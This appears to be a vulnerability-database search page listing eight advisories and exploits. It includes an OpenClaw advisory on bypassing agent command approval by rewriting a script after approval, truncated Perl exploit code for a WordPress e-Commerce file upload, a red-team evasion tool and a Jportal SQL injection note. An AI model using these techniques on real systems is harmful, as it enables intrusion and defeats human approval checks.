8 matches found

Github Security Blog
added 2026/03/13 3:48 p.m., 7 views

OpenClaw: Unrecognized script runners could bypass `system.run` approval integrity

Summary: In affected versions of openclaw, node-host system.run approvals did not bind a mutable file operand for some script runners, including forms such as tsx and jiti. An attacker could obtain approval for a benign script-runner command, rewrite the referenced script on disk, and have the...

CVSS 9.4, AI score 6.3, EPSS 0.00179
Exploits: 0, References: 5, Affected Software: 1
OSV
added 2024/11/07 9:31 a.m., 14 views

CVE-2024-50147 net/mlx5: Fix command bitmask initialization

In the Linux kernel, the following vulnerability has been resolved: net/mlx5: Fix command bitmask initialization. The command bitmask has a dedicated bit for the MANAGEPAGES command; this bit isn't initialized during command bitmask initialization, only during MANAGEPAGES. In addition,...

CVSS 5.5, AI score 6.2, EPSS 0.00231
Exploits: 0, References: 8
Kitploit
added 2023/02/17 11:30 a.m., 665 views

OffensivePipeline - Allows You To Download And Build C# Tools, Applying Certain Modifications In Order To Improve Their Evasion For Red Team Exercises

OffensivePipeline allows you to download and build C# tools, applying certain modifications in order to improve their evasion for Red Team exercises. A common use of OffensivePipeline is to download a tool from a Git repository, randomise certain values in the project, build it, obfuscate the...

CVSS 5.5, AI score 8.1, EPSS 0.99512
Exploits: 75, References: 87
OSV
added 2019/04/02 1:58 p.m., 5 views

OPENSUSE-SU-2019:1123-1 Security update for putty

This update for putty fixes the following issues: Update to new upstream release 0.71 boo1129633 CVE-2019-9894: Fixed a remotely triggerable memory overwrite in RSA key exchange, which can occur before host key verification potential recycling of random numbers used in cryptography. CVE-2019-9895...

CVSS 9.8, AI score 8.8, EPSS 0.03937
Exploits: 0, References: 7
seebug.org
added 2014/07/01 12:0 a.m., 16 views

Wordpress Plugin e-Commerce <= 3.4 - Arbitrary File Upload Exploit

No description provided by source. !/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand99999 . .php; no int print INTRO; messy print i know.. - Wordpress Plugin e-Commerce = 3.4 Arbitrary File Upload - Discovered && Coded by: t0pP8uZz Discovered...

AI score 7.1
Exploits: 0
Packet Storm
added 2008/10/29 12:0 a.m., 21 views

wpecomm-upload.txt

!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand99999 . ".php"; no int print ; print "\nEnter File Pathpath to local file to upload: "; chompmy $file=; my $ua = LWP::UserAgent-new; my $re = $ua-requestPOST $url...

AI score 7.4
Exploits: 0
exploitpack
added 2008/10/29 12:0 a.m., 28 views

WordPress Plugin E-Commerce 3.4 - Arbitrary File Upload

WordPress Plugin E-Commerce 3.4 - Arbitrary File Upload !/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; my $fname = rand99999 . ".php"; no int print ; print "\nEnter File Pathpath to local file to upload: "; chompmy $file=; my $ua = LWP::UserAgent-new; my $...

AI score 0.4
Exploits: 0
Packet Storm
added 2004/05/30 12:0 a.m., 19 views

jportal.txt

Jportal is a portal system, quite commonly used: Google Results 1 - 10 of about 56,100 for "powered by jportal". 0.22 seconds Homepage: http://jportal2.com/ I've read its code and found: in module/print.inc.php: function artprint .... $query = "SELECT FROM $arttbl WHERE id=$id"; ... What to say? ...

AI score 7.4
Exploits: 0